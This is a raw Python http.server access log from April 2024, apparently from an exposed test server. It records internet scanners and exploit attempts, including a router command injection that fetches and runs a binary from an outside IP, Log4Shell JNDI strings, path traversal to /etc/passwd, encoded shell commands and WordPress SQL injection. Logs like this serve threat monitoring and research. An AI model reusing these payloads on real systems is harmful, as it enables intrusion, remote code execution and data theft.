"/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 162.142.125.224 - - [10/Apr/2024 01:09:45] "GET / HTTP/1.1" 200 - 162.142.125.224 - - [10/Apr/2024 01:09:49] "GET / HTTP/1.1" 200 - 162.142.125.224 - - [10/Apr/2024 01:09:49] code 505, message Invalid HTTP version (2.0) 162.142.125.224 - - [10/Apr/2024 01:09:49] "PRI * HTTP/2.0" 505 - 162.142.125.224 - - [10/Apr/2024 01:09:50] code 404, message File not found 162.142.125.224 - - [10/Apr/2024 01:09:50] "GET /favicon.ico HTTP/1.1" 404 - ---------------------------------------- Exception occurred during processing of request from ('198.74.56.46', 49769) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 198.74.56.46 - - [10/Apr/2024 02:17:02] "GET / HTTP/1.1" 200 - 45.79.128.205 - - [10/Apr/2024 02:21:41] "GET / HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('192.155.88.231', 46315) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 192.155.88.231 - - [10/Apr/2024 02:25:14] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [10/Apr/2024 03:10:14] "GET / HTTP/1.1" 200 - 185.224.128.34 - - [10/Apr/2024 03:32:02] code 404, message File not found 185.224.128.34 - - [10/Apr/2024 03:32:02] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 87.121.69.52 - - [10/Apr/2024 03:37:16] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [10/Apr/2024 03:37:16] "CONNECT google.com:443 HTTP/1.1" 501 - ---------------------------------------- Exception occurred during processing of request from ('167.94.146.52', 57060) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 167.94.146.52 - - [10/Apr/2024 03:41:09] "GET / HTTP/1.1" 200 - 167.94.146.52 - - [10/Apr/2024 03:41:13] "GET / HTTP/1.1" 200 - 167.94.146.52 - - [10/Apr/2024 03:41:13] code 505, message Invalid HTTP version (2.0) 167.94.146.52 - - [10/Apr/2024 03:41:13] "PRI * HTTP/2.0" 505 - 167.94.146.52 - - [10/Apr/2024 03:41:14] code 404, message File not found 167.94.146.52 - - [10/Apr/2024 03:41:14] "GET /favicon.ico HTTP/1.1" 404 - 212.70.149.134 - - [10/Apr/2024 04:09:58] "GET / HTTP/1.0" 200 - 185.242.226.99 - - [10/Apr/2024 04:32:46] "GET / HTTP/1.1" 200 - 188.74.4.159 - - [10/Apr/2024 04:36:05] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [10/Apr/2024 04:38:48] code 404, message File not found 185.196.9.61 - - [10/Apr/2024 04:38:48] "GET /login.htm HTTP/1.1" 404 - 185.196.9.61 - - [10/Apr/2024 04:38:50] code 404, message File not found 185.196.9.61 - - [10/Apr/2024 04:38:50] "GET /formLoginAuth.htm?authCode=1&userName=admin&goURL&action=login HTTP/1.1" 404 - 185.224.128.43 - - [10/Apr/2024 04:57:40] "GET / HTTP/1.1" 200 - 185.150.26.240 - - [10/Apr/2024 05:30:21] "GET / HTTP/1.1" 200 - 46.174.191.32 - - [10/Apr/2024 05:34:00] "GET / HTTP/1.0" 200 - 103.153.183.105 - - [10/Apr/2024 05:37:14] code 404, message File not found 103.153.183.105 - - [10/Apr/2024 05:37:14] "GET /.env HTTP/1.1" 404 - 103.153.183.105 - - [10/Apr/2024 05:37:16] code 501, message Unsupported method ('POST') 103.153.183.105 - - [10/Apr/2024 05:37:16] "POST / HTTP/1.1" 501 - 185.196.9.61 - - [10/Apr/2024 05:47:07] code 501, message Unsupported method ('POST') 185.196.9.61 - - [10/Apr/2024 05:47:07] "POST /classes/Login.php?f=login HTTP/1.1" 501 - 185.196.9.61 - - [10/Apr/2024 05:47:10] "GET / HTTP/1.1" 200 - 34.140.130.61 - - [10/Apr/2024 05:58:43] "GET / HTTP/1.1" 200 - 194.120.230.95 - - [10/Apr/2024 06:00:43] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [10/Apr/2024 06:09:57] code 404, message File not found 185.196.9.61 - - [10/Apr/2024 06:09:57] "GET /apisix/admin/migrate/export HTTP/1.1" 404 - 194.120.230.94 - - [10/Apr/2024 06:32:16] "GET / HTTP/1.1" 200 - 185.224.128.34 - - [10/Apr/2024 06:33:33] code 404, message File not found 185.224.128.34 - - [10/Apr/2024 06:33:33] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 185.196.9.61 - - [10/Apr/2024 06:45:32] code 501, message Unsupported method ('POST') 185.196.9.61 - - [10/Apr/2024 06:45:32] "POST /ddns_check.ccp HTTP/1.1" 501 - 185.150.26.246 - - [10/Apr/2024 07:27:10] "GET / HTTP/1.1" 200 - 37.191.69.31 - - [10/Apr/2024 07:58:25] "GET / HTTP/1.1" 200 - 37.191.69.31 - - [10/Apr/2024 07:58:25] "GET / HTTP/1.1" 200 - 117.199.152.75 - - [10/Apr/2024 08:01:24] "GET / HTTP/1.1" 200 - 185.224.128.34 - - [10/Apr/2024 09:08:11] code 404, message File not found 185.224.128.34 - - [10/Apr/2024 09:08:11] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 202.26.144.61 - - [10/Apr/2024 09:32:29] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [10/Apr/2024 09:40:13] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [10/Apr/2024 09:40:13] "CONNECT google.com:443 HTTP/1.1" 501 - 205.210.31.232 - - [10/Apr/2024 09:47:34] "GET / HTTP/1.1" 200 - 110.80.136.230 - - [10/Apr/2024 09:50:51] "GET / HTTP/1.1" 200 - 51.254.59.113 - - [10/Apr/2024 09:54:42] "GET / HTTP/1.1" 200 - 51.254.59.113 - - [10/Apr/2024 09:54:43] "GET /images/ HTTP/1.1" 200 - 194.120.230.94 - - [10/Apr/2024 10:19:49] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [10/Apr/2024 10:25:27] "GET / HTTP/1.1" 200 - 198.235.24.138 - - [10/Apr/2024 10:28:43] "GET / HTTP/1.0" 200 - 185.196.9.61 - - [10/Apr/2024 10:49:53] "GET /?x=${jndi:ldap://${:-262}${:-707}.${hostName}.uri.cnu5g6j332t368874ndgqtr5ib86tpow1.oast.live/a} HTTP/1.1" 200 - 185.196.9.61 - - [10/Apr/2024 10:49:56] "GET / HTTP/1.1" 200 - 80.66.77.235 - - [10/Apr/2024 10:52:08] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [10/Apr/2024 10:59:33] code 501, message Unsupported method ('POST') 185.196.9.61 - - [10/Apr/2024 10:59:33] "POST /./RestAPI/LogonCustomization HTTP/1.1" 501 - 185.196.9.61 - - [10/Apr/2024 10:59:36] code 501, message Unsupported method ('POST') 185.196.9.61 - - [10/Apr/2024 10:59:36] "POST /./RestAPI/LogonCustomization HTTP/1.1" 501 - 185.196.9.61 - - [10/Apr/2024 10:59:39] code 501, message Unsupported method ('POST') 185.196.9.61 - - [10/Apr/2024 10:59:39] "POST /./RestAPI/Connection HTTP/1.1" 501 - 185.196.9.61 - - [10/Apr/2024 10:59:42] code 404, message File not found 185.196.9.61 - - [10/Apr/2024 10:59:42] "GET /help/admin-guide/test.jsp HTTP/1.1" 404 - 109.205.213.198 - - [10/Apr/2024 11:17:36] "GET / HTTP/1.1" 200 - 194.120.230.94 - - [10/Apr/2024 11:28:09] "GET / HTTP/1.1" 200 - 185.224.128.34 - - [10/Apr/2024 12:03:35] code 404, message File not found 185.224.128.34 - - [10/Apr/2024 12:03:35] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 194.120.230.95 - - [10/Apr/2024 12:19:26] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [10/Apr/2024 12:58:59] code 404, message File not found 185.196.9.61 - - [10/Apr/2024 12:58:59] "GET /services/pluginscript/..;/..;/..;/getFavicon?host=cnu5g6j332t368874ndg67s5ygpsjr8cq.oast.live HTTP/1.1" 404 - ---------------------------------------- Exception occurred during processing of request from ('199.45.154.22', 38528) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 45.125.66.34 - - [10/Apr/2024 13:13:02] code 501, message Unsupported method ('CONNECT') 45.125.66.34 - - [10/Apr/2024 13:13:02] "CONNECT google.com:443 HTTP/1.1" 501 - 45.79.181.251 - - [10/Apr/2024 13:20:10] code 400, message Bad request version ("\\x8e\\x86Vp¾Uôw'\\x84Yc;\\x16;v") 45.79.181.251 - - [10/Apr/2024 13:20:10] "\x16\x03\x01\x00\x85\x01\x00\x00\x81\x03\x03x8TC%`\x01Mkç\x1e\x8e\x86Vp¾Uôw'\x84Yc;\x16;v" 400 - 194.120.230.95 - - [10/Apr/2024 13:45:10] "GET / HTTP/1.1" 200 - 64.62.156.57 - - [10/Apr/2024 13:49:32] "GET / HTTP/1.1" 200 - 64.62.156.62 - - [10/Apr/2024 13:52:35] code 404, message File not found 64.62.156.62 - - [10/Apr/2024 13:52:35] "GET /favicon.ico HTTP/1.1" 404 - 64.62.156.55 - - [10/Apr/2024 13:53:19] code 404, message File not found 64.62.156.55 - - [10/Apr/2024 13:53:19] "GET /geoserver/web/ HTTP/1.1" 404 - 198.235.24.228 - - [10/Apr/2024 13:59:01] code 400, message Bad request version ('À\\x13À') 198.235.24.228 - - [10/Apr/2024 13:59:01] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x033ëlzPow9hPBà{\x0cð\x1fÀûÝ\x87u«4Ñ0\x96\x80Ò\x1cÎ8\x11 i£/\x9b¼\x10á*à¯-³Î\x0cnê¼H¯\x07=ð\x8a\x05()\x91äÏ3}\x89\x00&À+À/À,À0̨̩À\x09À\x13À" 400 - 198.235.24.228 - - [10/Apr/2024 13:59:02] code 400, message Bad request version ('À(À$À\\x14À') 198.235.24.228 - - [10/Apr/2024 13:59:02] "\x16\x03\x01\x00Ê\x01\x00\x00Æ\x03\x03\x90wÈ1\x13\x14*e¾\x05o²ßã#(\x8fy\x82ç\x0búoo\x8eÎ/I8\x1bÅ\x1d\x00\x00hÌ\x14Ì\x13À/À+À0À,À\x11À\x07À'À#À\x13À\x09À(À$À\x14À" 400 - 185.150.26.240 - - [10/Apr/2024 14:17:13] "GET / HTTP/1.1" 200 - 192.241.194.103 - - [10/Apr/2024 14:25:22] code 400, message Bad request syntax ('MGLNDD_194.193.213.117_80') 192.241.194.103 - - [10/Apr/2024 14:25:22] "MGLNDD_194.193.213.117_80" 400 - 80.94.92.60 - - [10/Apr/2024 14:28:46] "GET / HTTP/1.1" 200 - 194.120.230.95 - - [10/Apr/2024 14:42:53] "GET / HTTP/1.1" 200 - 185.224.128.34 - - [10/Apr/2024 14:43:16] code 404, message File not found 185.224.128.34 - - [10/Apr/2024 14:43:16] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 185.196.9.61 - - [10/Apr/2024 14:58:11] code 404, message File not found 185.196.9.61 - - [10/Apr/2024 14:58:11] "GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ping${IFS}-c${IFS}1${IFS}cnu5g6j332t368874ndg9pmeq59t4wfuy.oast.live HTTP/1.1" 404 - 162.191.106.216 - - [10/Apr/2024 15:12:49] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [10/Apr/2024 15:13:57] "GET / HTTP/1.1" 200 - 35.203.210.123 - - [10/Apr/2024 15:17:36] "GET / HTTP/1.1" 200 - 194.120.230.95 - - [10/Apr/2024 15:17:46] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [10/Apr/2024 15:26:13] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [10/Apr/2024 15:26:13] "CONNECT google.com:443 HTTP/1.1" 501 - 185.224.128.43 - - [10/Apr/2024 15:27:24] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [10/Apr/2024 16:12:13] code 404, message File not found 185.196.9.61 - - [10/Apr/2024 16:12:13] "GET /icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1" 404 - 185.196.9.61 - - [10/Apr/2024 16:12:15] code 404, message File not found 185.196.9.61 - - [10/Apr/2024 16:12:15] "GET /icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1" 404 - 185.196.9.61 - - [10/Apr/2024 16:12:17] code 501, message Unsupported method ('POST') 185.196.9.61 - - [10/Apr/2024 16:12:17] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 501 - 172.245.112.200 - - [10/Apr/2024 16:16:52] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [10/Apr/2024 16:17:18] code 404, message File not found 185.196.9.61 - - [10/Apr/2024 16:17:18] "GET /api/ping/;%60id%60 HTTP/1.1" 404 - 193.106.29.125 - - [10/Apr/2024 16:18:23] "GET / HTTP/1.0" 200 - 185.150.26.246 - - [10/Apr/2024 16:34:15] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [10/Apr/2024 16:58:33] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [10/Apr/2024 17:02:54] code 404, message File not found 185.196.9.61 - - [10/Apr/2024 17:02:54] "GET /cgi-bin/export-cgi?category=config&arg0=startup-config.conf HTTP/1.1" 404 - 185.180.143.138 - - [10/Apr/2024 17:17:03] "GET / HTTP/1.1" 200 - 207.90.244.14 - - [10/Apr/2024 17:21:23] "GET / HTTP/1.1" 200 - 207.90.244.14 - - [10/Apr/2024 17:21:23] code 404, message File not found 207.90.244.14 - - [10/Apr/2024 17:21:23] "GET /robots.txt HTTP/1.1" 404 - 207.90.244.14 - - [10/Apr/2024 17:21:24] code 404, message File not found 207.90.244.14 - - [10/Apr/2024 17:21:24] "GET /sitemap.xml HTTP/1.1" 404 - 207.90.244.14 - - [10/Apr/2024 17:21:24] code 404, message File not found 207.90.244.14 - - [10/Apr/2024 17:21:24] "GET /.well-known/security.txt HTTP/1.1" 404 - 207.90.244.14 - - [10/Apr/2024 17:21:25] code 404, message File not found 207.90.244.14 - - [10/Apr/2024 17:21:25] "GET /favicon.ico HTTP/1.1" 404 - 185.196.9.61 - - [10/Apr/2024 17:23:47] code 404, message File not found 185.196.9.61 - - [10/Apr/2024 17:23:47] "GET /wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(md5(999999999),%200x2c,%208),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20g HTTP/1.1" 404 - 185.196.10.155 - - [10/Apr/2024 17:49:36] code 501, message Unsupported method ('POST') 185.196.10.155 - - [10/Apr/2024 17:49:36] "POST /cgi-bin/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/.%%%%32%%65/bin/sh HTTP/1.1" 501 - 188.166.172.245 - - [10/Apr/2024 17:54:41] code 400, message Bad request syntax ('\\x16\\x03\\x01\\x01þ\\x01\\x00\\x01ú\\x03\\x03') 188.166.172.245 - - [10/Apr/2024 17:54:41] "\x16\x03\x01\x01þ\x01\x00\x01ú\x03\x03" 400 - 185.224.128.34 - - [10/Apr/2024 18:12:41] code 404, message File not found 185.224.128.34 - - [10/Apr/2024 18:12:41] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 185.196.9.61 - - [10/Apr/2024 19:07:04] code 501, message Unsupported method ('POST') 185.196.9.61 - - [10/Apr/2024 19:07:04] "POST /?rest_route=/notificationx/v1/analytics HTTP/1.1" 501 - 216.218.206.68 - - [10/Apr/2024 19:30:53] code 400, message Bad request version ('À\\x14À') 216.218.206.68 - - [10/Apr/2024 19:30:53] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x0b^¸¤ÆÐÊ/Û\x84Ø\x8d÷\x95\x04\x91!É\x8a@¤xÕí\x9e\x99l¯\x87\x14È\x19\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 192.241.196.34 - - [10/Apr/2024 19:37:14] code 404, message File not found 192.241.196.34 - - [10/Apr/2024 19:37:14] "GET /druid/index.html HTTP/1.1" 404 - 185.224.128.43 - - [10/Apr/2024 19:54:22] "GET / HTTP/1.1" 200 - 192.241.237.51 - - [10/Apr/2024 19:59:28] code 404, message File not found 192.241.237.51 - - [10/Apr/2024 19:59:28] "GET /hudson HTTP/1.1" 404 - 109.195.3.77 - - [10/Apr/2024 20:19:52] code 404, message File not found 109.195.3.77 - - [10/Apr/2024 20:19:52] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=ZWNobwlzQ1ROekdEeVZxT0NVZVVicQ== HTTP/1.0" 404 - 185.224.128.34 - - [10/Apr/2024 20:52:18] code 404, message File not found 185.224.128.34 - - [10/Apr/2024 20:52:18] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 185.196.9.61 - - [10/Apr/2024 20:53:28] "GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5(999999999),null,null%20--%20g HTTP/1.1" 200 - 185.196.9.61 - - [10/Apr/2024 21:10:06] "GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1" 200 - 107.170.239.4 - - [10/Apr/2024 21:15:18] code 404, message File not found 107.170.239.4 - - [10/Apr/2024 21:15:18] "GET /manager/html HTTP/1.1" 404 - 106.75.93.23 - - [10/Apr/2024 21:15:30] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [10/Apr/2024 21:17:34] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [10/Apr/2024 21:17:34] "CONNECT google.com:443 HTTP/1.1" 501 - 212.70.149.134 - - [10/Apr/2024 21:42:21] code 404, message File not found 212.70.149.134 - - [10/Apr/2024 21:42:21] "GET /cgi/conf.bin HTTP/1.1" 404 - 185.196.9.61 - - [10/Apr/2024 21:49:01] code 404, message File not found 185.196.9.61 - - [10/Apr/2024 21:49:01] "GET /InsightPluginShowGeneralConfiguration.jspa; HTTP/1.1" 404 - 146.19.24.28 - - [10/Apr/2024 21:49:23] "GET / HTTP/1.1" 200 - 37.252.1.34 - - [10/Apr/2024 21:50:58] "GET / HTTP/1.0" 200 - 128.14.173.117 - - [10/Apr/2024 22:07:59] "GET / HTTP/1.1" 200 - 185.150.26.240 - - [10/Apr/2024 22:24:07] "GET / HTTP/1.1" 200 - 109.205.213.198 - - [10/Apr/2024 22:28:51] "GET / HTTP/1.1" 200 - 194.120.230.95 - - [10/Apr/2024 22:33:43] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [10/Apr/2024 22:50:07] "GET / HTTP/1.1" 200 - 87.246.7.66 - - [10/Apr/2024 23:13:35] "GET / HTTP/1.1" 200 - 85.239.33.117 - - [10/Apr/2024 23:14:59] "GET / HTTP/1.1" 200 - 85.239.33.117 - - [10/Apr/2024 23:15:51] code 404, message File not found 85.239.33.117 - - [10/Apr/2024 23:15:51] "GET /.env HTTP/1.1" 404 - 185.196.9.61 - - [10/Apr/2024 23:22:40] code 404, message File not found 185.196.9.61 - - [10/Apr/2024 23:22:40] "GET /wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://cnu5g6j332t368874ndgwtoueapzggxsu.oast.live HTTP/1.1" 404 - 34.217.14.26 - - [10/Apr/2024 23:51:03] code 404, message File not found 34.217.14.26 - - [10/Apr/2024 23:51:03] "GET /v1/agent/self HTTP/1.1" 404 - 185.150.26.246 - - [11/Apr/2024 00:01:10] "GET / HTTP/1.1" 200 - 185.196.10.155 - - [11/Apr/2024 00:14:52] code 501, message Unsupported method ('POST') 185.196.10.155 - - [11/Apr/2024 00:14:52] "POST /boaform/admin/formLogin HTTP/1.1" 501 - 146.19.24.28 - - [11/Apr/2024 00:18:50] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [11/Apr/2024 01:12:12] "GET / HTTP/1.1" 200 - 83.97.73.245 - - [11/Apr/2024 01:17:32] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 - 185.224.128.43 - - [11/Apr/2024 01:22:18] "GET / HTTP/1.1" 200 - 194.50.16.190 - - [11/Apr/2024 01:24:27] "GET / HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('198.74.56.46', 42950) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 198.74.56.46 - - [11/Apr/2024 01:55:31] "GET / HTTP/1.1" 200 - 44.220.185.200 - - [11/Apr/2024 02:00:53] "GET / HTTP/1.1" 200 - 83.97.73.245 - - [11/Apr/2024 02:13:54] code 404, message File not found 83.97.73.245 - - [11/Apr/2024 02:13:54] "GET /actuator/gateway/routes HTTP/1.1" 404 - 42.96.15.107 - - [11/Apr/2024 02:19:47] code 404, message File not found 42.96.15.107 - - [11/Apr/2024 02:19:47] "GET /.env HTTP/1.1" 404 - 42.96.15.107 - - [11/Apr/2024 02:19:47] code 501, message Unsupported method ('POST') 42.96.15.107 - - [11/Apr/2024 02:19:47] "POST / HTTP/1.1" 501 - 146.19.24.28 - - [11/Apr/2024 02:20:42] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [11/Apr/2024 02:33:19] "GET / HTTP/1.1" 200 - 45.79.181.179 - - [11/Apr/2024 02:45:50] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [11/Apr/2024 02:54:22] "GET / HTTP/1.1" 200 - 39.97.209.211 - - [11/Apr/2024 03:23:04] code 404, message File not found 39.97.209.211 - - [11/Apr/2024 03:23:04] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=ZWNobwktZQlcXHg2NVxceDYzXFx4NjhcXHg2ZlxceDIwXFx4NjhcXHg2NVxceDZjXFx4NmNcXHg2ZlxceDc3XFx4NmZcXHg3MlxceDZjXFx4NjR8c2g= HTTP/1.1" 404 - 185.196.9.61 - - [11/Apr/2024 03:24:51] code 501, message Unsupported method ('POST') 185.196.9.61 - - [11/Apr/2024 03:24:51] "POST /wp-admin/admin-ajax.php HTTP/1.1" 501 - 46.174.191.28 - - [11/Apr/2024 03:42:32] "GET / HTTP/1.0" 200 - 192.155.90.220 - - [11/Apr/2024 03:45:20] "GET / HTTP/1.1" 200 - 192.155.90.118 - - [11/Apr/2024 03:46:26] "GET / HTTP/1.1" 200 - 194.120.230.95 - - [11/Apr/2024 04:00:10] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [11/Apr/2024 04:20:47] code 404, message File not found 185.196.9.61 - - [11/Apr/2024 04:20:47] "GET /wp-admin/admin-ajax.php?meta_ids=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&action=remove_post_meta_condition HTTP/1.1" 404 - 185.196.10.155 - - [11/Apr/2024 04:22:29] "GET / HTTP/1.1" 200 - 45.79.128.205 - - [11/Apr/2024 04:56:33] "GET / HTTP/1.1" 200 - 107.170.230.21 - - [11/Apr/2024 05:13:46] code 404, message File not found 107.170.230.21 - - [11/Apr/2024 05:13:46] "GET /actuator/health HTTP/1.1" 404 - 198.199.103.75 - - [11/Apr/2024 05:38:33] code 404, message File not found 198.199.103.75 - - [11/Apr/2024 05:38:33] "GET /ReportServer HTTP/1.1" 404 - 35.187.98.121 - - [11/Apr/2024 05:42:57] "GET / HTTP/1.1" 200 - 198.98.51.91 - - [11/Apr/2024 06:04:45] code 501, message Unsupported method ('POST') 198.98.51.91 - - [11/Apr/2024 06:04:45] "POST /boaform/admin/formLogin HTTP/1.1" 501 - 45.125.66.34 - - [11/Apr/2024 06:09:27] code 501, message Unsupported method ('CONNECT') 45.125.66.34 - - [11/Apr/2024 06:09:27] "CONNECT google.com:443 HTTP/1.1" 501 - 185.224.128.43 - - [11/Apr/2024 06:11:56] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [11/Apr/2024 06:28:01] code 501, message Unsupported method ('POST') 185.196.9.61 - - 